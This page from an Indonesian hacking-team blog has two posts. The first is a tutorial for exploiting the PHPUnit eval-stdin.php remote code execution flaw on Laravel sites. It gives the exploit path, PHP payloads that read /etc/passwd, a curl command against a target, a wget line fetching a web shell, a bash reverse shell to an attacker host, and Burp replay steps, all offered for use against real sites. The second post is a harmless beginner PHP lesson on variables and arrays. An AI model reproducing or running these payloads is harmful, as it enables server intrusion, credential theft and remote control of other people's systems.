3

TUTORIAL LARAVEL PHPUNIT REMOTE CODE EXECUTION

Thursday, October 24, 2019 Kenzoid
Oke Gayn Berjumpa Dengan Gue KENZO_ID, Kali Ini Gue Akan Share TUTORIAL LARAVEL PHPUNIT REMOTE CODE EXECUTION
Oke Langsung Aja Ya.....
Laravel PHPUnit Remote Code Execution. Sebenarnya Ini Bug Udah Lama Banget. Tapi Jujur Aja Gue Juga Gk Tau Karena Emang Udah Jarang Banget Update Masalah Exploit. Nah Karena Exploit Ini Kembali Rame, Akhirnya Gue Coba Share Aja Deh Di Blog Barangkali Ada Yang Belum Tau. Celah Ini Sebenarnya Terletak Pada Vendor Third Party Yakni PHPUnit, Bukan Dari Laravelnya.

  • Vuln: eval-stdin.php
  • Full Path Exploit : http://target/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • Affected versions : Before 4.8.28 and 5.x before 5.6.3

Disini Kalian Bebas Untuk Mengirim Datanya Menggunakan Burp Suite, Postman, Atau Curl Pun Bisa. Disini Gue Share Yang Pake Curl Dulu Karena Menurut Gue Ini Yang Paling Simple.

Gunakan Parameter -d Atau –data Untuk Nengirim Payloadnya. Payload Yang Bisa Digunakan:

<?php system('tail /etc/passwd'); ?>
<?php echo php_uname(); ?>
<?php show_source('/etc/passwd'); ?>
Contoh Command
curl -d "<?php echo php_uname(); ?>" http://webtarget/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
Kalau Ingin Spawn Shell Ya Tinggal Diubah Payloadnya Menjadi Wget Misalnya
<?php system('wget https://raw.githubusercontent.com/linuxsec/indoxploit-shell/master/shell-v3.php'; ?>
Atau Diubah Ke Perintah Untuk Backconnect
<?php system('bash -i >& /dev/tcp/evilserver.com/666 0>&1');?>
Lalu Di Evil Server Dilisten Ke Port 666.
Atau, Kalian Bisa Menggunakan Burpsuite.
Intercept, Lalu Kirim Requestnya Ke Repeater.

Lalu Klik Menu Repeater, Masukkan Payloadnya Dibawah, Dan Klik Tombol Go.
Untuk Responnya Bisa Dilihat Di Sebelah Kolom Request (Sebelah Kanan).
Oke Mungkin Itu Aja Tutorial Kali Ini, Sekian Dan Semoga Bermanfaat.
Salam UMC.KENZO_ID 403
My Team (403 Forbidden Team)
https://rajaview.id/nIBkGRqtTiA7tdAvkAWk8p34GW88qUJG75qkrJhx
Posted - October 24, 2019 3 comments
0

Belajar php dasar

Tuesday, October 8, 2019 sadflix
Oke kali ini gantai mau ngasih tau seputar php.. tapi yang dasar ya :" soalnya gantai baru belajar ..
Langsung aja ..

Cara penulisan kode PHP :
Untuk menulis kode dalam php .  Di awali dengan <?php dan di akhiri dengan ?>
Contoh :
<?php
Echo "gantai gans";
?>

Tipe data
PHP mengenal dua tipe data sederhana:
- numerik
- literal
dan dua tipe data yang tidak sederhana:
array
- object
Kali ini .. gantai mau ngasih tau tipe data sederhana nya dulu..
Contoh tipe data sederhana :
<?php
//Tipe data numerik
$harga = 2000;
$jumlah = 5;

echo $harga."<br>";
echo $jumlah."<br>";

//tipe data literal
$nama = "gantai";
$alamat = "garut";

echo $nama."<br>";
echo $alamat."<br>";
?>
Output
2000
5
Gantai
Garut

Variable
Variable digunakan sebagai tempat
penyimpanan data sementara. Data yang
disimpan dalam variabel akan hilang setelah
program selesai dieksekusi.
Variable di PHP diawali dengan tanda $, untuk
dapat menggunakan variable, ada dua langkah
yang harus dilakukan yaitu deklarasi dan
inisialisasi.
Deklarasi Variable
Deklarasi variable yaitu mendaftarkan variable
ke dalam program.
Contoh:
<?php
$nama = "gantai";
$nama1 = "gans";
echo $nama."<br>";
echo $nama1;
?>
Output
gantai
gans

Array
Array merupakan variable spesial karena dalam
satu variable tersebut dapat memiliki banyak
nilai di dalamnya.
Contoh :
<?php
$bangke = array("manusia", "elu",
"Pacar");
echo "Saya adalah ".$bangke[0]. "<br>";
echo "Saya benci ". $bangke[1]. "<br>";
echo "Saya ga punya ". $bangke[2];
?>
Output
saya adalah manusia
Saya benci elu
Saya ga punya pacar

Sekian .. pembelajaran kyta tentang php.. jika ada kesalahan moon maap  . Karna saya juga baru belajar tadi sore :D
Oke thnks gantai gans :)


https://rajaview.id/nIBkGRqtTiA7tdAvkAWk8p34GW88qUJG75qkrJhx
Posted - October 08, 2019 0 comments
Labels:
Subscribe to: Posts (Atom)